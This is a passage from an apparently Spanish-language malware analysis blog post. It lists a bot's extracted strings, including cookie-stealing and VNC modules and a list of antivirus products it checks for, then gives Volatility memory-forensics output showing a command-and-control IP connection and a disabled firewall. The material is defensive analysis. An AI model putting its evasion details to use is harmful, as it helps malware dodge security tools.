<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1E8 ASCII "POST ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1F0 ASCII "FAIL",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1F8 ASCII ".swf",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A200 ASCII ".flv",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A208 ASCII "facebook.com",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A21C ASCII "%BOTID%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A224 ASCII "%BOTNET%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A230 ASCII "%BC-*-*-*-*%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A240 ASCII "%VIDEO%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A248 ASCII "Cookie: %s</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C50 ASCII "api",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C54 ASCII "cmd",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C58 ASCII "C1F20D2340B51905"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C68 ASCII "6A7D89B7DF4B0FFF"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C78 ASCII 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C7C UNICODE ".exe",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C88 ASCII "update.exe",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C9C ASCII "config.bin",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026A0 UNICODE "ll",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026A8 ASCII "cookie_module",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026B8 ASCII "cit_ffcookie.mod"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026C8 ASCII "ule",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026CC ASCII "video_module",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026DC ASCII "cit_video.module"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D80 DD Dumped9.00409F98 UNICODE "Microsoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D84 DD Dumped9.00409F70 UNICODE "Microsoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D88 DD Dumped9.00409F44 UNICODE "Microsoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D8C DD Dumped9.00409F24 UNICODE "ESET"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D90 DD Dumped9.00409F04 UNICODE "ESET"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D94 DD Dumped9.00409EE8 UNICODE "AVG"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D98 DD Dumped9.00409ECC UNICODE "AVG"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D9C DD Dumped9.00409EB0 UNICODE "AVG"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DA0 DD Dumped9.00409E8C UNICODE "AntiVir"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DA4 DD Dumped9.00409E68 UNICODE "avast!"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DA8 DD Dumped9.00409E3C UNICODE "Kaspersky"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DAC DD Dumped9.00409E14 UNICODE "Kaspersky"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB0 DD Dumped9.00409DEC UNICODE "Norton"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB4 DD Dumped9.00409DC4 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB8 DD Dumped9.00409DA0 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DBC DD Dumped9.00409D74 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC0 DD Dumped9.00409D50 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC4 DD Dumped9.00409D20 UNICODE "McAfee"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC8 DD Dumped9.00409CF0 UNICODE "McAfee"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DCC DD Dumped9.00409CE0 UNICODE "McAfee"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DD0 DD Dumped9.00409CB8 UNICODE "SafenSoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C64 UNICODE "ComSpec",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C74 ASCII "Mozilla/4.0 (com"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C84 ASCII "patible; MSIE 7."</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C94 ASCII "0; Windows NT 5."</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CA4 ASCII "1; SV1)",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CAC ASCII "POST",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CB4 ASCII "GET",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CB8 ASCII "Connection: clos"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CC8 ASCII "e</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CCC ASCII "urlmon.dll",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CD8 ASCII "ObtainUserAgentS"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CE8 ASCII "tring",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D08 UNICODE "S:(ML;;N"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D18 UNICODE "RNWNX;;;"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D28 UNICODE "LW)",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D30 UNICODE "SeSecuri"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D40 UNICODE "tyPrivil"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D50 UNICODE "ege",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D58 UNICODE "S:(ML;CI"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D68 UNICODE "OI;NRNWN"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D78 UNICODE "X;;;LW)",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407DEC ASCII "wxz",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407DF0 ASCII "aeiouy",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407DF8 UNICODE "Global\",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407E08 UNICODE "Local\",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409C50 ASCII "GAEZ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409C74 ASCII "71:> &2",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CB8 UNICODE "SafenSof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CC8 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CCC UNICODE "SysWatch"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CDC UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CE0 UNICODE "McAfee",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CF0 UNICODE "McAfee",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CFE UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D0E UNICODE " Center",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D20 UNICODE "McAfee",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D2E UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D3E UNICODE "Center",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D50 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D60 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D62 UNICODE "Client",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D74 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D84 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D86 UNICODE "Protecti"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D96 UNICODE "on",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DA0 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DB0 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DB2 UNICODE "Shared",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DC4 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DD4 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DD6 UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DE6 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DEC UNICODE "Norton",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DFA UNICODE "Protecti"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E0A UNICODE "on",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E14 UNICODE "Kaspersk"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E24 UNICODE "y",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E28 UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E38 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E3C UNICODE "Kaspersk"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E4C UNICODE "y",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E50 UNICODE "Anti-Vir"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E60 UNICODE "us",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E68 UNICODE "avast!",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E76 UNICODE "Antiviru"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E86 UNICODE "s",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E8C UNICODE "AntiVir",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E9C UNICODE "Desktop",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409EB8 UNICODE "Monitor",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409ED4 UNICODE "Service",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409EF0 UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F00 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F04 UNICODE "ESET",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F0E UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F1E UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F24 UNICODE "ESET",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F2E UNICODE "Antiviru"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F3E UNICODE "s",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F44 UNICODE "Microsof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F54 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F58 UNICODE "Inspecti"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F68 UNICODE "on",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F70 UNICODE "Microsof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F80 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F84 UNICODE "Malware",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F98 UNICODE "Microsof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FA8 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FAC UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FBC UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FC0 ASCII "GetProcAddress",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FD0 ASCII "LoadLibraryA",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FE0 ASCII "NtCreateThread",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FF0 ASCII "NtCreateUserProc"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A000 ASCII "ess",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A004 ASCII "NtQueryInformati"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A014 ASCII "onProcess",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A020 ASCII "RtlUserThreadSta"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A030 ASCII "rt",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A034 ASCII "LdrLoadDll",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A040 ASCII "LdrGetDllHandle",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A050 ASCII ".reloc",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A060 UNICODE ".dat",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A06C ASCII "RFB 003.003</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A07C ASCII "RFB ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A08C UNICODE ".txt",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A10C ASCII "https://",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A118 ASCII "User-Agent",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A124 ASCII "Cookie",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A12C ASCII "Accept-Language",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A13C ASCII "Accept-Encoding",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A14C ASCII "HTTP/1.",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A154 ASCII "Transfer-Encodin"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A164 ASCII "g",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A168 ASCII "chunked",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A170 ASCII "Connection",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A17C ASCII "close",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A184 ASCII "Proxy-Connection"</span></div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Analisis Dinámico (dumpit! + volatility)</b></span><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Volatility</span><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">pslist</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81bc97c0 System 4 0 56 661 ------ 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81952b10 smss.exe 528 4 3 19 ------ 0 2014-08-22 20:45:49 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81954b60 csrss.exe 592 528 11 378 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819abb60 winlogon.exe 616 528 19 261 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a5aad0 services.exe 668 616 16 247 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a4a748 lsass.exe 680 616 25 349 0 0 2014-08-22 20:45:50 UTC+0000</b></span><br />
<b style="font-family: 'Courier New', Courier, monospace; font-size: small;">0x81a0f020 svchost.exe 880 668 18 212 0 0 2014-08-22 20:45:51 UTC+0000</b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81904da0 svchost.exe 956 668 9 220 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a04c30 svchost.exe 1048 668 76 1312 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81a1b428 svchost.exe 1108 668 7 81 0 0 2014-08-22 20:45:51 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x8191f020 svchost.exe 1136 668 15 201 0 0 2014-08-22 20:45:52 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x818e4230 explorer.exe 1508 1472 31 648 0 0 2014-08-22 20:45:53 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x818fc318 spoolsv.exe 1612 668 14 116 0 0 2014-08-22 20:45:54 UTC+0000</b></span><br />
<b style="font-family: 'Courier New', Courier, monospace; font-size: small;">0x819c9da0 smsniff.exe 360 1508 3 79 0 0 2014-08-22 20:46:03 UTC+0000</b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819aebe0 wuauclt.exe 452 1048 8 143 0 0 2014-08-22 20:46:06 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819c5980 alg.exe 1240 668 6 101 0 0 2014-08-22 20:46:07 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x819c4c10 udpi.exe 796 720 0 -------- 0 0 2014-08-22 20:47:21 UTC+0000 2014-08-22 20:47:26 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x81947020 DumpIt.exe 1428 1508 2 57 0 0 2014-08-22 20:48:37 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Conexiones activas en el pid 1508, que corresponde a explorer.exe</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Offset(P) Local Address Remote Address Pid</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>---------- ------------------------- ------------------------- ---</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x01d8ed80 10.0.2.15:1041 23.228.250.83:80 1508</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0x01d8f418 10.0.2.15:1037 23.228.250.83:80 1508</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Se deshabilita el firewall de windows.</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>C:\Python27\Scripts>vol.py -f memory.dmp printkey -K "ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Volatility Foundation Volatility Framework 2.4</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Legend: (S) = Stable (V) = Volatile</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>----------------------------</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\sysftem</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Key name: StandardProfile (S)</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Last updated: 2011-07-15 21:12:13 UTC+0000</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Subkeys:</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> (S) AuthorizedApplications</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Values:</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD EnableFirewall : (S) 0</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>REG_DWORD DoNotAllowExceptions : (S) 0</b></span><br />
